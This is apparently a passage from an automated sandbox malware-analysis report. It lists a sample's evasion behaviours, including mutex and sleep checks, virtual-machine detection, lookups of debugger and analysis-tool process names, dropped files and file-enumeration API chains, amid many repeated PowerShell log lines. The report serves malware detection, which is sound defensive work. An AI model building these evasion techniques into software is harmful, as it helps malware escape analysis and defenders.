Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_0040CCF0	4_2_0040CCF0
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_0040CCF0	5_2_0040CCF0
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_0040CCF0	7_2_0040CCF0

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_4-4355
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_4-4355
Source: C:\Windows\sysnldcvmr.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_5-4357
Source: C:\Users\user\AppData\Local\Temp\640832494.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\sysnldcvmr.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_5-4357
Source: C:\Users\user\AppData\Local\Temp\640832494.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\dwm.exe

System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	API/Special instruction interceptor: Address: 7FFEFE52D044
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFEFE52D044
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 542B83A

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: 2779421088.exe, 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU
Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHAV
Source: 2779421088.exe, 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: INTERNALNAMECFF EXPLORER.EXE
Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TORUNS.EXEDUMPCAP.EXEDE4R
Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE

Source: C:\Windows\sysnldcvmr.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Thread delayed: delay time: 930000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\sysnldcvmr.exe	Window / User API: threadDelayed 4531	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Window / User API: threadDelayed 1067	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7119
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7907
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1542
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 559
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4362
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4990
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8172
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2320

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys			Jump to dropped file
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Evaded block: after key decision	graph_4-4416
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Evaded block: after key decision	graph_4-4357
Source: C:\Windows\sysnldcvmr.exe	Evaded block: after key decision	graph_7-4355

Source: C:\Windows\sysnldcvmr.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep	graph_5-5747
Source: C:\Windows\sysnldcvmr.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_5-4374
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep	graph_4-5280
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_4-4371

Source: C:\Users\user\AppData\Local\Temp\2910625892.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	API coverage: 3.9 %
Source: C:\Windows\sysnldcvmr.exe	API coverage: 1.0 %

Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_0040CCF0		7_2_0040CCF0
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_0040CCF0		4_2_0040CCF0

Source: C:\Windows\sysnldcvmr.exe TID: 7748	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe TID: 7780	Thread sleep count: 4531 > 30	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe TID: 7780	Thread sleep time: -13593000s >= -30000s	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe TID: 7748	Thread sleep count: 1067 > 30	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe TID: 7912	Thread sleep count: 335 > 30	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe TID: 7764	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe TID: 8020	Thread sleep time: -930000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\640832494.exe TID: 6720	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472	Thread sleep count: 7119 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468	Thread sleep count: 2284 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5204	Thread sleep count: 7907 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1400	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4356	Thread sleep count: 1542 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep count: 4362 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6560	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 1580	Thread sleep count: 31 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008	Thread sleep count: 4990 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6588	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6960	Thread sleep count: 8172 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2872	Thread sleep count: 2320 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\640832494.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	4_2_004066B0
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_00406570
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	5_2_004066B0
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00406570
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	7_2_004066B0
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00406570
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F71B09 FindFirstFileExW,	9_2_00F71B09
Source: C:\Users\user\AppData\Local\Temp\640832494.exe	Code function: 13_2_001D1A20 memset,memset,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,PathCombineW,CharLowerW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathCombineW,FindNextFileW,CloseHandle,	13_2_001D1A20

Source: C:\Users\user\AppData\Local\Temp\896429707.exe

Code function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,

4_2_00402020

Source: C:\Windows\sysnldcvmr.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Thread delayed: delay time: 930000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
